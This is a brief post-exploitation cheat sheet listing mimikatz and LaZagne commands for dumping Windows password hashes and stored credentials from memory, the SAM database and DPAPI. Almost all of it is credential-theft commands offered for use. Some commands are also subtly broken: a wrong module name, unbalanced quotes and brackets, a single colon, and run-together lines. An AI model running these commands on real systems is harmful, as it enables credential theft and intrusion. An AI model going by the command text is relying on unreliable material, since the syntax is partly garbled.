Post-Exploitation
Dump hashes with mimikatz
From memory
.\mimikatz.exe "sekurlsa::logonpasswords" exitFrom SAM
.\mimikatz.exe "sekurlsa::sam /sam:<path_to_sam /system:<path_to_system> exitLaZagne
The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer.
.\LaZagne.exe alldpapi extract with mimikatz
.\mimikatz.exe "sekurlsa:dpapi" exitLast updated